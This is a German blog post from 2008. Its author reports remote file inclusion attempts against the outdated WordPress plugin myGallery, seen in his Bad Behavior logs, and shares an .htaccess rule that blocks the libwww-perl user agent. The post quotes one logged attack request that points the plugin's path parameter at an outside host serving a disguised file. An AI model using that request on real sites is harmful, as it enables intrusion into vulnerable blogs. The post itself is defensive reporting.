myGallery-Hackversuche
6. Oktober 2008 – 20:33 Uhr
Eben gerade habe ich bei Reparaturarbeiten an meinem Bad Behavior (BB) (ja, den Fehler von neulich habe ich selbst durch eine kleine Nachlässigkeit hineingestrickt und soeben korrigiert) in der Datentabelle von BB mehrere Versuche entdeckt, über ein unsicheres Plugin Dateien einzuschleusen:
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.sexery.de/prc.gif?
Das betreffende Plugin ist ein Galerie-Plugin für WordPress namens myGallery, es ist schon etwas älter und die Sicherheitslücke betrifft zudem ältere Versionen (wohl vor 1.4b5), aber womöglich setzt es einer meiner Leser noch ein. Es scheint, dass da irgendein krimineller Idiot versucht, ältere und inzwischen womöglich vernachlässigte Blogs in seinem Sinne zu »bearbeiten«.
Die Einschleusungsversuche kommen über wechselnde IP-Adressen, der User-Agent ist dagegen immer »libwww-perl/5.810«, eine freie Perl-Bibliothek, die – auch mit allen anderen Versionsnummern – zumindest mir bisher ausschließlich in Form von Hackversuchen, Spamversuchen und uninteressanten Suchrobotern begegnet ist. Weswegen es gut ist, dass Bad Behavior Zugriffe dieser Agents anhand seiner ›Blacklist‹ (blacklist.inc.php) unabhängig von der anhängenden Versionsnummer blockiert.
Das kriminelle Skript geht übrigens nach dem Gießkannen-Prinzip vor, es versucht einfach flächendeckend über das Anhängen des o.a. Plugin-Pfades, aber mit wechselnden anzuhängenden Dateien, in Blogs einzudringen. Ich hatte myGallery nie im Einsatz.
Wer Bad Behavior nicht einsetzt, kann die User-Agents »libwww-perl« in seiner .htaccess generell blockieren:
RewriteEngine On
RewriteBase /
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl.*$
RewriteRule ^.* – [F]
Anmerkung: die ersten beiden Zeilen, das Initialisieren der Rewrite-Engine, kann man sich eventuell sparen, wenn diese schon an früherer Stelle in der .htaccess mit genau diesen Zeilen gestartet wurde. Was tatsächlich der Fall ist, wenn man die »sprechenden« Artikel-URLs eingeschaltet hat.
Dieser Inhalt (Textbeitrag und Fotos) ist unter einer Creative-Commons-Lizenz BY-NC-ND lizenziert.
Im Autohaus wird...
Dir auch einen guten Rutsch! Hokey